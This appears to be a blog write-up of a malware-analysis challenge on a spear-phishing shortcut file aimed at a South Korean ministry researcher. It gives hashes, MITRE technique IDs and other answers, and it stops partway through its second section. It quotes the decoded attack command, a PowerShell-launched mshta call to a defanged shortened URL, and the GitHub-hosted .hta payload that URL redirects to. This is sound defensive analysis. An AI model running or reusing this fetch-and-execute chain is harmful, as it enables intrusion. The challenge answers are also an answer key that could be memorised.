Post

[Research] MalOps - Operation Silent Serpent

[Research] MalOps - Operation Silent Serpent

Introducion

A senior researcher at South Korea’s Ministry of Science opened a mali…

The Lure

Scenario: An employee reported a strange email attachment. Your task is to analyze the extracted files and uncover the initial attack vector.

alt text

Question 1

1
What is the SHA256 hash of the decoy file?

R: 1D01EAB612DA7D635E6B92395EAD126E3E07B7987B3A38C8831E25CBCD5456B7

alt text


Question 2

1
What is the SHA-256 hash of the suspected malicious file?

R: E51C6DAF902638023E5922A871279E57D858761EF500C3BCB214737CD39FCBDD

alt text


Question 3

1
Which legitimate file type is the malicious file attempting to impersonate?

R: .txt


Question 4

1
When was this malicious shortcut file created?

R: 2025-03-11 19:03:42

alt text


Question 5

1
Which system executable is explicitly targeted to run by this malicious file?

R: powershell.exe

alt text


Question 6

1
To visually deceive the user, the malicious file uses a specific Icon Index. What is the index number?

R: 97

alt text


Question 7

1
What specific 'Show window' flag is set to ensure the payload executes silently without alerting the user?

R: SW_SHOWMINNOACTIVE

alt text


Question 8

1
After decoding the payload, what is the full command executed by the malicious file?

R: powershell mshta “https[:]//link24[.]kr/A46bl74”

alt text


Question 9

1
Which adversary technique is being used when the malicious file leverages a trusted Windows system executable to execute its payload?

R: System Binary Proxy Execution


Question 10

1
The decoded payload utilizes a specific utility to proxy execution. What is the MITRE ATT&CK Sub-technique ID associated with the abuse of this specific binary?

R: T1218.005


Question 11

1
The initial payload makes a network request to a shortened URL. What is the full URL provided in the HTTP redirect response?

R: https[:]//github[.]com/deepsearch-tech/ref/releases/download/v1.0.0/pwko[.]hta?v=1


Question 12

1
The redirect points to a specific file hosted on a public code repository. What is the name and extension of this downloaded file?

R: pwko.hta


Question 13

1
The redirected URL points to a file hosted on a public repository. What is the username or organization name associated with this repository?

R: deepsearch-tech


Remote Staging

Scenario: The attacker leverages cloud infrastructure to deliver additional payloads. Analyze the retrieved scripts and map the delivery mechanism

Question 1

1
What is the SHA256 hash of the file downloaded from the public repository?

R: 587bdf94bdaebcee4b51202beb507125a7fa37d705fb38cc076a9c1814578411

pwko.hta file that was downloaded from the repository.


Question 2

1
What is the exact file size in bytes of this downloaded payload?

R: 58290


Question 3

1
What is the primary scripting object utilized by the HTA file to execute system commands?

R: WSCRIPT.SHELL


Question 4

1
This post is licensed under CC BY 4.0 by the author.